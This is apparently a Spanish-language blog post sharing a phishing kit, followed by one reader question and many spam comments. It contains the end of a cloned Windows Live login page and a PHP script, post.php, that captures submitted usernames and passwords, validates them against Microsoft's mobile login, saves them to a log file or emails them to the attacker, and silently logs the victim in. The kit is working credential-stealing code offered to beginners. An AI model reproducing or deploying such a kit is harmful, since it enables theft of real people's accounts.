id="idTd_Tile_RealmDiscoveryMsg0"></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td><table style="width: 100%;" cellpadding="0" cellspacing="0"><tbody><tr><td><table cellpadding="0" cellspacing="0"><tbody><tr><td style="display: none;" class="wlid_errorholder" id="idTd_PWD_Error0Pwd"></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 4px;" id="idTd_PWD_UsernameLbl0Pwd"><label id="idLbl_PWD_Username0Pwd" for="i0116"><nobr>Windows Live ID:</nobr></label></td></tr><tr><td style="padding-bottom: 16px;" class="cssTextBoxTD" id="idTd_PWD_UsernameTb0Pwd"><div style="position: relative; width: 100%;"><table style="width: 100%; table-layout: fixed;" cellpadding="0" cellspacing="0"><tbody><tr><td><input class="cssTextInput" maxlength="113" id="i0116" name="login" type="text"></td></tr></tbody></table><div style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;"><div class="cssHelpDiv" style="color: rgb(153, 153, 153);" id="idDiv_PWD_UsernameExample0Pwd"></div></div></div></td></tr><tr><td><table cellpadding="0" cellspacing="0"><tbody><tr><td style="display: none;" class="wlid_errorholder" id="idTd_PWD_Error_Password0Pwd"></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 4px;" id="idTd_PWD_PasswordLbl0Pwd"><label id="idLbl_PWD_Password0Pwd" for="i0118">Contraseña:</label></td></tr><tr><td style="padding-bottom: 4px;" class="cssTextBoxTD" id="idTd_PWD_PasswordTb0Pwd"><input class="cssTextInput" autocomplete="off" maxlength="16" id="i0118" name="passwd" type="password"></td></tr><tr><td style="padding-bottom: 20px;" id="idTd_PWD_PasswordHelp0Pwd"><div style="padding: 0px;" class="cssHelpText" id="idDiv_PWD_ForgotPassword0Pwd"><a id="idA_PWD_ForgotPassword0Pwd" href="https://login.live.com/resetpw.srf?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1314554681%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26cbcxt%3dmai%26snsc%3d1%26vv%3d1100%26mkt%3dES-AR%26lc%3d11274&id=64855&mkt=ES-AR&lc=11274&username=">¿Ha olvidado la contraseña?</a></div></td></tr><tr><td style="padding-bottom: 20px;" id="idTd_PWD_KMSI_Cb0Pwd"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align: top;"><input class="cssCheckbox" value="1" id="idChkBx_PWD_KMSI0Pwd" name="KMSI" type="checkbox"></td><td><label id="idLbl_PWD_KMSI_Cb0Pwd" for="idChkBx_PWD_KMSI0Pwd">Mantener la sesión iniciada</label></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 20px;" id="idTd_PWD_SubmitCancelTbl0Pwd"><table cellpadding="0" cellspacing="0"><tbody><tr><td><input style="height: 25px;" value="Iniciar sesión" id="idSIButton9" name="SI" type="submit"></td><td></td></tr></tbody></table></td></tr><tr><td style="padding-bottom: 16px;" id="idTd_PWD_CredPicker0Pwd"><table cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td style="padding-bottom: 4px;" id="idTd_PWD_SwitchToOTCText0Pwd"><span id="idSpan_PWD_SwitchToOTC0Pwd">¿No es su equipo?</span></td></tr><tr><td><a title="Obtener un código de un solo uso para iniciar sesión con" id="idA_PWD_SwitchToOTC0Pwd" href="#">Obtener un código de un solo uso para iniciar sesión con</a></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></form></div></td></tr><tr><td id="moreTD"></td></tr></tbody></table></td></tr><tr><td></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td><img style="visibility: hidden;" id="ev" height="0"></td></tr><tr><td class="cssFooterPadding" id="footerTD"><table cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="left"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="text-align: left;"><span id="ftrCopy">©2011 Microsoft</span></td><td style="text-align: left;"><span></span></td><td width="8px"> </td><td style="border-left: 1px solid rgb(102, 102, 102);" width="8px"> </td><td style="text-align: left;"><a style="color: rgb(102, 102, 102);" id="ftrTerms" href="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=ES-AR&vv=1100">Términos</a></td><td width="8px"> </td><td style="border-left: 1px solid rgb(102, 102, 102);" width="8px"> </td><td style="text-align: left;"><a style="color: rgb(102, 102, 102);" id="ftrPrivacy" href="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=ES-AR&vv=1100">Privacidad</a></td></tr></tbody></table></td><td><table cellpadding="0" cellspacing="0"><tbody><tr></tr></tbody></table></td><td align="right"><table cellpadding="0" cellspacing="0"><tbody><tr><td style="text-align: right;"><a style="color: rgb(102, 102, 102);" id="ftrHelp" href="http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=ES-AR&vv=1100">Centro de ayuda</a></td><td width="8px"> </td><td style="border-left: 1px solid rgb(102, 102, 102);" width="8px"> </td><td style="text-align: right;"><a style="color: rgb(102, 102, 102);" id="ftrFdbk" href="http://login.live.com/gls.srf?urlID=WLFeedback&mkt=ES-AR&vv=1100">Comentarios</a></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html> 


Archivo post.php 

<?php
## Code by l0ve
## hecho por l0ve
## l0ve.diosdelared.com
//Config.
//Configuraciones agregadas for newbies
//Para las opciones:
//"1" - es igual a SI
//"0" - es igual a NO
//pueden estar actividas o desactivadas todas las opciones o una de ellas.

//opciones:

//Que lleguen las contraseñas al e-mail? Por defecto: 0

$enviar_al_email = "0";

## Code by l0ve
## hecho por l0ve
## l0ve.diosdelared.com
//Direccion de email donde llegaran las contraseñas?

$config_email = "TU@EMAIL.etc";

//Guardar en archivo?

$guardar_en_archivo = "1";

//Nombre de archivo y ruta donde se guardaran? Por defecto: ./log.txt
$config_archivo = "./log.txt";

//Cadena para buscar en el code de Face?

$exp = "&t=";  //No modificar sin conocimientos

// Fin config.
## Code by l0ve
## hecho por l0ve
## l0ve.diosdelared.com

//De aca para abajo no tocar sin conocer

$user = $_POST[login];
$pass = $_POST[passwd];
#by l0ve

$opciones = array('http' =>
array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
'User-Agent' => 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16',
'Referer' => 'http://login.live.com',
        'content' => "__ET=&LoginTextBox=$user&PasswordTextBox=$pass&PasswordSubmit=Iniciar+sesi%C3%B3n"
    )


);
$contexto  = stream_context_create($opciones);
$resultado = file_get_contents('https://mid.live.com/si/login.aspx', false, $contexto);
if(preg_match("/$exp/i", $resultado) ) {
if($enviar_al_email == 1) {
mail("$config_email", "Te llego un pass. de Face.", "usuario: $user\npassword: $pass");
}

if($guardar_en_archivo == 1) {
$fd=fopen("$config_archivo",'a');
fwrite($fd,"Usuario: $user\r\nContraseña:$pass\n\n");
fclose($fd);
}
echo "<body onload=\"document.formulario.submit()\">

<form action=\"https://mid.live.com/si/login.aspx\" method=post name=formulario>

<input type=hidden name=LoginTextBox value=$user>
<input type=hidden name=PasswordTextBox value=$pass>
<input type=hidden name=PasswordSubmit value=Iniciar+sesi%C3%B3n>
<input type=hidden name=__EVENTTARGET value=\"\">
<input type=hidden name=__EVENTARGUMENT value=\"\">
<input type=hidden name=__ET value=\"\">

</body>

</form>";
} else {
header("Location: index.php");
}
?>

Back Top

19 comentarios:

  1. ya bueno y que hago con esto donde lo coloco???

  2. Actuallу no matter іf someοne doeѕn't be aware of afterward its up to other users that they will help, so here it occurs.

    Feel free to surf to my web-site; chatroulett

  3. It's an awesome article designed for all the internet users; they will get benefit from it I am sure.

    Look into my web page :: Present effect
    my site: presentation Anxiety

  4. Do you have a spam issuе on thiѕ blog; I alsо am a blοgger, and Ι wаs wanting to know уouг situаtion;
    manу of us have сгеаted somе
    nice methods anԁ we aгe looκing to ѕwap
    tесhniquеs with other fοlks,
    be ѕure to shoot me an email if іntегeѕtеd.


    Here is my web blog - chatroulette

  5. An outstanding share! I've just forwarded this onto a co-worker who had been doing a little homework on this. And he in fact bought me breakfast due to the fact that I found it for him... lol. So let me reword this.... Thank YOU for the meal!! But yeah, thanks for spending time to discuss this matter here on your blog.

    Feel free to surf to my blog; linked web-site

  6. Good aгtіcle. I'm experiencing a few of these issues as well..

    Also visit my web blog ... Hemroids

  7. Hi there, I want to subscribe for this wеbѕitе to get nеwest upԁateѕ, ѕo where саn i
    ԁo іt pleаsе assіѕt.


    Look аt my ωeb site com.au

  8. I'm really enjoying the design and layout of your site. It'ѕ a ѵегy еasy on the eyes which
    makeѕ it much more pleasant for me to come here and visit more often.
    Dіd уou hire out a developeг to crеate уour theme?
    Excellent work!

    Feеl free to surf to my ωeb site; raspberryketoned.co.uk

  9. І couldn't refrain from commenting. Very well written!

    Feel free to surf to my web-site - vitamin shoppe coupon code

  10. As an illustration these who are seriously obese normally have troubles inside their knees and ankles whenever they
    wander or use an elliptical machine.

    Here is my web site: dumbbell sets

  11. This is often suited for jogging training routines, jogging, or going for walks.


    my weblog; bowflex adjustable dumbbells

  12. all the time i used to read smaller articles or reviews that also clear their motive, and that
    is also happening with this paragraph which I am reading now.


    Here is my web page :: benefits of juicing

  13. Hi there everybody, here every one is sharing these kinds of familiarity, thus it's nice to read this web site, and I used to pay a visit this blog all the time.

    My web page :: back acne treatment

  14. Truly when someone doesn't know after that its up to other people that they will assist, so here it happens.

    Feel free to visit my web-site acne cures - -

  15. My partner and I absolutely love your blog and find nearly all of your post's to be exactly what I'm looking for.
    Does one offer guest writers to write content for you personally?
    I wouldn't mind producing a post or elaborating on some of the subjects you write about here. Again, awesome weblog!

    My web-site ... acne treatments

  16. Good post. I learn something new and challenging on blogs I
    stumbleupon every day. It will always be interesting to read through content from other writers and practice a little something from their sites.


    Stop by my page: benefits of juicing

  17. Hello, this weekend is pleasant in support of me, since this moment i am reading this
    great educational post here at my house.

    My blog :: juicing vegetables

Publicar un comentario

Blaaa blaa y + blaa.. escribe las dudas que tengas :D

- No incluyas Correos electrónicos por seguridad propia.
- No SPAM/Flood.
- Se borrará cualquier comentario ofensivo, racista o vulgar.